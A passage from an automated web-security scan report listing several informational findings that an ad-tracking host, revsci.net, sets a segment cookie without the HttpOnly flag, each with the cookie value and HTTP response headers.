Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7U1qHNUdlHLPM5AqF7BNa0pYflQcV79fjL0tuNsq1PBC4dQFP7CuHjAC6pOp24XOz79cZhArDSL9bvUudrTRvEIroA4NCzad0MsU2sXKSNtkRN4Gq5YX61eq3sz4DxD58sbq+VGlvjNo1C2NsLJvYHpIaxKEcAVCfYNFuiJW9Ld6LCksMDycjv5iOP60aUROV32LGj6skxKEfVMjClll66J4IEP/xpmdrbkw2u1kTEZnZn+uDtlgoahVnyL84qaC73ti4HPMP6DDXwgyzvy3zXjb9F8x4cUAH+mu25iz/7xFtrTMDRXohiE7z0OhT3yWVMDmAvayqLMJWypL5ig0W+H0hIkdRrpoDA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:42:57 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:42:56 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.224. http://pix04.revsci.net/I10985/b3/0/3/1008211/750853358.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/750853358.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpE9zg2XM99W8hh7D7TE48BgWgC2jH6DE8lPJ46nSAf8HexFSelZEk/128ANX9NGypaAj1dgReFoR/1inB9lkygaVMIuoUXY9UyLxLUJcdgb+/7pVB0HuGhRq0W0NN8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:30:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpE9zg2XM99W8hh7D7TE48BgWgC2jH6DE8lPJ46nSAf8HexFSelZEk/128ANX9NGypaAj1dgReFoR/1inB9lkygaVMIuoUXY9UyLxLUJcdgb+/7pVB0HuGhRq0W0NN8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:30:28 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:30:27 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.225. http://pix04.revsci.net/I10985/b3/0/3/1008211/759659174.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/759659174.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU4gSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoEridsU/hQklS2zn/pSli2Rtkys7Cu8F3vwD23Ocs5M84e0l41ypjZYa9NNMjP/hg2a3P12VkLJJJbFyyvvcQ5CQO2cz4UB2K2EQhvUfC08cNafWRTmSV2FwxnXs29jI+nkMU8QmD0Bw1ao85QIlZkQZOLlk8uZWjFC67AWXT7UY7ZfMhzB3jROUkKH71DeERmutZ0nwCpSMd1gSceTdwz3s/hdPZOKqyKJC4V5f1N/ueW59kACHLWrA+OydZDjZS9CIFnDETP3cdmwWlQPRzO+JjeN8UGRBRTjLTQMJBSEhb3PpNUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQsSUoLnATqy/tiKdn75egfCW6fd5NtGZUI+/7w3o0IhSHSQw8NLNwy4LRWKIS+7LyZ9TiE7e99bDIy6bGQBwxkT6ha/M3fu5OW8n0Io1Z0J+sMQ+tZ6lcs2ZkNNg=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:31:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU4gSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoEridsU/hQklS2zn/pSli2Rtkys7Cu8F3vwD23Ocs5M84e0l41ypjZYa9NNMjP/hg2a3P12VkLJJJbFyyvvcQ5CQO2cz4UB2K2EQhvUfC08cNafWRTmSV2FwxnXs29jI+nkMU8QmD0Bw1ao85QIlZkQZOLlk8uZWjFC67AWXT7UY7ZfMhzB3jROUkKH71DeERmutZ0nwCpSMd1gSceTdwz3s/hdPZOKqyKJC4V5f1N/ueW59kACHLWrA+OydZDjZS9CIFnDETP3cdmwWlQPRzO+JjeN8UGRBRTjLTQMJBSEhb3PpNUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQsSUoLnATqy/tiKdn75egfCW6fd5NtGZUI+/7w3o0IhSHSQw8NLNwy4LRWKIS+7LyZ9TiE7e99bDIy6bGQBwxkT6ha/M3fu5OW8n0Io1Z0J+sMQ+tZ6lcs2ZkNNg=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:31:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:31:32 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.226. http://pix04.revsci.net/I10985/b3/0/3/1008211/773834418.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/773834418.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtOYbK3cCc/jF4tZOI4ZaDiAcniGiXBSKKyJVvRZxbwn/ueWxekEi2xHb40hIvIhWgfLCLgssvxCqQjtw/Xfz8sAmsgAmGWKbk2k07Pni/xK23tz8t96F0V0W1LQ+5EdE6wJ2SwOpge0ECfCi6hGNHqCcmpBdYdZho+uLCE6vyBtQLChUXPl+uuC8vCr9Xa+mttDWNRKHSQw0cLNwnCnp3H2FRAEywdItUzNBpaGUnzS+EJINB46ubsBm79Ct6Yvm9ps8vXKyABn16OytJdRoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:02:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtOYbK3cCc/jF4tZOI4ZaDiAcniGiXBSKKyJVvRZxbwn/ueWxekEi2xHb40hIvIhWgfLCLgssvxCqQjtw/Xfz8sAmsgAmGWKbk2k07Pni/xK23tz8t96F0V0W1LQ+5EdE6wJ2SwOpge0ECfCi6hGNHqCcmpBdYdZho+uLCE6vyBtQLChUXPl+uuC8vCr9Xa+mttDWNRKHSQw0cLNwnCnp3H2FRAEywdItUzNBpaGUnzS+EJINB46ubsBm79Ct6Yvm9ps8vXKyABn16OytJdRoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:02:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:02:31 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.227. http://pix04.revsci.net/I10985/b3/0/3/1008211/778726069.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/778726069.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd75eIrx12q53Y2j8zDjGQ0zaGKg0beJVdN909hLW6U3SszoJ4UGSJUJwBNuyrIiZbbb05W2rfLwB6MSKTAxJlDB6k7hioicEEcjKP6DDXwgyzvy3zXjb9F8xod4AH+mu28DlOp3pWURvqQeuQD++EpJt8z2EVRz4KiLXeBbx4qcJhuo2tdDVDn1cvt8UNM8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:20:09 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd75eIrx12q53Y2j8zDjGQ0zaGKg0beJVdN909hLW6U3SszoJ4UGSJUJwBNuyrIiZbbb05W2rfLwB6MSKTAxJlDB6k7hioicEEcjKP6DDXwgyzvy3zXjb9F8xod4AH+mu28DlOp3pWURvqQeuQD++EpJt8z2EVRz4KiLXeBbx4qcJhuo2tdDVDn1cvt8UNM8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:20:09 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:20:09 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.228. http://pix04.revsci.net/I10985/b3/0/3/1008211/783069022.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/783069022.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iLS00ItR9yFTE/YWVXwG8UEUWKH12XbyUc8QPYIV82GNbI6JzmHpkCVsOMUVWjFxmH17ALs7UHM40i6gFlt3Z9BCO8ZJpO/3SGtyu10WXcya4FXkwkzaDZAeo1iJd9HThKNt7rts7BnIcclhhpqzjUEmGqm7YiZYggM4wIytbEwdmrXllsUXty6F1Rx29F0jBOLDdfT5l9FRKZIy4pNiDNePEa4Xej9Wo9+rBfbSVBIaVeEx5zEJoHcDTeRVc03kpUc1J292q/07; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:38:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iLS00ItR9yFTE/YWVXwG8UEUWKH12XbyUc8QPYIV82GNbI6JzmHpkCVsOMUVWjFxmH17ALs7UHM40i6gFlt3Z9BCO8ZJpO/3SGtyu10WXcya4FXkwkzaDZAeo1iJd9HThKNt7rts7BnIcclhhpqzjUEmGqm7YiZYggM4wIytbEwdmrXllsUXty6F1Rx29F0jBOLDdfT5l9FRKZIy4pNiDNePEa4Xej9Wo9+rBfbSVBIaVeEx5zEJoHcDTeRVc03kpUc1J292q/07; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:38:43 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:38:43 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.229. http://pix04.revsci.net/I10985/b3/0/3/1008211/791107298.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/791107298.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKQJnIcaZP0OG+K1TVdceBnAk0K+jW+8zO6PZVdN909hLW6U3SszoJ4UGSJUJwBNvCgtlitVpEHxH/U/nxw+K0euFsiQbwAZpCdMOuAuxLFtJvZhlg+uZFSUKB2jielQgHXzANC4gHpVkBOGa3eWiyV0SqZNVe0D3NUVKDinJAOYGfBZEDB+M9DRdyJq9bt5XnNME=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:22:15 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKQJnIcaZP0OG+K1TVdceBnAk0K+jW+8zO6PZVdN909hLW6U3SszoJ4UGSJUJwBNvCgtlitVpEHxH/U/nxw+K0euFsiQbwAZpCdMOuAuxLFtJvZhlg+uZFSUKB2jielQgHXzANC4gHpVkBOGa3eWiyV0SqZNVe0D3NUVKDinJAOYGfBZEDB+M9DRdyJq9bt5XnNME=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:22:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:22:15 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.230. http://pix04.revsci.net/I10985/b3/0/3/1008211/811937771.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/811937771.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKLT2uikdn5vw/ZUsicc4VPat72X0BRE3fmuDUz/xw+ppzybIZwS4Eca2TOPNNPf1VWx+g6q/yqUz7hReIUafnkll3Rq9qruA1HphVsEataiCU4UsktlzVfsKfbGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdrai8EDZe5QGsJaR2lbzBppIqOW4sghTvfDbBz9w6xOnT6rKWeoL4o7hjL6yZJnvXVE/sak4VW1ruM/+CyXwJk4Hw4YSr369H0jhzHFve3eZhMuANMVlHLPP5gs5zBNa0q4sbKxPSlJ+Dr9tNi3/kNAewybd7S4DSWipP44CIAMVSFYHAD053+0LFGYD6cdJHq+Xxmn8pVBku2H5LxEeONgXe2Rb0eURb/DUc8APYKUwl8auJCEmLIdLrK3FGlmLgXyl5F5sYnIsytuxFsAUBEpmQ232iRqQn4VheUU+7XmFCi7gwUI1/JSNLf3zVlP93r+tmLtsYrZSu4olovzFDWLZalCAK9m0inSch7wHrKI2jDUlKH251qJet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35h8C7g7+ztf1TvTm7N6yq2hVkZ7u74bje6nfDdoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:05:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKLT2uikdn5vw/ZUsicc4VPat72X0BRE3fmuDUz/xw+ppzybIZwS4Eca2TOPNNPf1VWx+g6q/yqUz7hReIUafnkll3Rq9qruA1HphVsEataiCU4UsktlzVfsKfbGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdrai8EDZe5QGsJaR2lbzBppIqOW4sghTvfDbBz9w6xOnT6rKWeoL4o7hjL6yZJnvXVE/sak4VW1ruM/+CyXwJk4Hw4YSr369H0jhzHFve3eZhMuANMVlHLPP5gs5zBNa0q4sbKxPSlJ+Dr9tNi3/kNAewybd7S4DSWipP44CIAMVSFYHAD053+0LFGYD6cdJHq+Xxmn8pVBku2H5LxEeONgXe2Rb0eURb/DUc8APYKUwl8auJCEmLIdLrK3FGlmLgXyl5F5sYnIsytuxFsAUBEpmQ232iRqQn4VheUU+7XmFCi7gwUI1/JSNLf3zVlP93r+tmLtsYrZSu4olovzFDWLZalCAK9m0inSch7wHrKI2jDUlKH251qJet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35h8C7g7+ztf1TvTm7N6yq2hVkZ7u74bje6nfDdoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:05:11 GMT; Path=/
X-Proc-ms: 1
